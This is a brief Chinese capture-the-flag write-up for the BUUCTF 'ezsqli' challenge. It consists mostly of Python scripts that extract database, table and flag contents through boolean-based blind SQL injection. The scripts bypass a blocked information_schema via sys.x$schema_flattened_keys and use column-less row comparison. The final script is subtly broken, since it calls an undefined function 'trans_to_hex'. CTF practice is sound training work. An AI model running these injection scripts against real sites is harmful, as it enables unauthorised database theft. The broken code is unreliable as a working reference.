ezsqli
)
爆库
give_grandpa_pa_pa_pa
import requests url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php" data = {"id":""} result = "" i = 0 while( True ): i = i + 1 head=32 tail=127 while( head < tail ): mid = (head + tail) >> 1 #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid) data['id'] = "1+(ascii(substr(database(),%d,1))>%d)" % (i , mid) #print(data) r = requests.post(url,data=data) r.encoding = "utf-8" #print(url+payload) #print(r.text) if "V&N" in r.text : head = mid + 1 else: #print(r.text) tail = mid last = result if head!=32: result += chr(head) else: break print(result)
爆表
information_schema被禁用了
然后看了大佬的wp发现还有个可用 sys.x$schema_flattened_keys可以用来爆
select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database()
发现两张表:
f1ag_1s_h3r3_hhhhh,users233333333333333
import requests url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php" data = {"id":""} result = "" i = 0 while( True ): i = i + 1 head=32 tail=127 while( head < tail ): mid = (head + tail) >> 1 #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid) data['id'] = "1+(ascii(substr((select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database())),%d,1))>%d)" % (i , mid) #print(data) r = requests.post(url,data=data) r.encoding = "utf-8" #print(url+payload) #print(r.text) if "V&N" in r.text : head = mid + 1 else: #print(r.text) tail = mid last = result if head!=32: result += chr(head) else: break print(result)
直接爆字段
无列明爆字段,学到了,但是还是很疑惑这个列数怎么得到的
抄了大师傅的链接: http://www.gem-love.com/ctf/1782.html
学到新姿势,用字符串比较来爆破。
# -*- coding: utf-8 -*- import requests def to_hex(str): result = '0x' for i in str: temp = hex(ord(i)) result += temp.replace('0x','') return result url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php" data = {"id":""} result = "" cont = 100 while( cont>0 ): for i in range(32,126): now_str = trans_to_hex( result+chr(i) ) data['id'] = "1+((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh limit 2,1))".format(now_str) #print(data) r = requests.post(url,data=data) r.encoding = "utf-8" #print(r.text) if "V&N" in r.text : result+=chr(i-1) print(result) cont = cont - 1 break